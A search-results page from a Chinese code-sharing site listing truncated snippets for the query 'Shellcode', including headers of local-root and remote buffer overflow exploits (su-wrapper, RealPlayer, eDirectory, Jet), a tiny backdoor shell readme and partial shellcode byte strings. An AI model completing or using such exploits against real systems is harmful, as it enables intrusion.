代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/101670/15822428
c su-wrapper.c
/* - su-wrapper.c - */
/*************************************************************************/
/* /usr/sbin/su-wrapper(su-wrapper 1.1.1) local root exploit. */
/*
www.eeworm.com/read/390409/8466532
txt readme.txt
Tiny_Shell 0.1 (普通版本)By Anskya
某天精神好了一点的时候写的,使用KOL+删除多余资源+清除PE重定位表+FSG压缩体积只有3k.
感谢那些提供Code和教程的GG and JJ们~~ ^_^
Tiny_Shell.dpr 工程时最简单的shell采用匿名单管道设计
本来打算不用管道直接写的,但是怕连目录都无法显示所以还是用了单管道
有个BUG-很明显的那 ...
www.eeworm.com/read/311961/13620711
inf oemsetup.inf
; OEMSETUP FILE FOR DM9 based Ethernet adapters
; Windows NT v3.51
; Windows NT v4.0
;
; Supported adapters:
; DAVICOM DM9102/A Based Adapter
;
;
; Usage:
;
; This fi
www.eeworm.com/read/112772/6143803
inf oemsetup.inf
[Identification]
OptionType = NetTransport
[Options]
PACKET
[FileConstants]
UtilityInf = "UTILITY.INF"
subroutineinf = "SUBROUTN.INF"
SoftwareType = "service"
Exit_Code
www.eeworm.com/read/151990/12152400
cpp 1.cpp
//RealPlayer .smil溢出漏洞攻击代码
#include
#include
#include
char pre[] =
"\n"
" \n"
" \n"
" \n"
"
www.eeworm.com/read/142631/12935060
mht 关于windows下shellcode编写的一点思考.mht
From:
Subject: =?gb2312?B?tbG1scLbzLMgLSA6OrzGy+O7+ry8yvU6OiAtILHgs8zM7LXYIC0gudjT2lc=?=
=?gb2312?B?aW5kb3dzz8JTaGVsbENvZGWx4NC0tcTSu7Xjy7y/vCAtIHBvd2VyZWQgYnk=
www.eeworm.com/read/159132/10692417
pl exploit.pl
#!/usr/bin/perl
#
# 《网络渗透技术》演示程序
# 作者:san, alert7, eyas, watercloud
#
# exploit.pl
# exploit program vulnerable
$shellcode =
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\
www.eeworm.com/read/299754/7834512
c exe_pro.c
#include
#include
extern char **environ;
int main(int argc, char **argv){
char large_string[128];
long *long_ptr = (long *) large_string;
int i;
char shellcode[] =
"\xeb\
www.eeworm.com/read/253602/12210122
txt microsoft jet database engine db file buffer overflow exploit.txt
########################################################
#
# See-security Technologies ltd.
#
# http://www.see-security.com
#
########################################################
#
#
www.eeworm.com/read/253602/12210439
txt novell edirectory server imonitor remote buffer overflow exploit.txt
package Msf::Exploit::edirectory_imonitor;
use strict;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',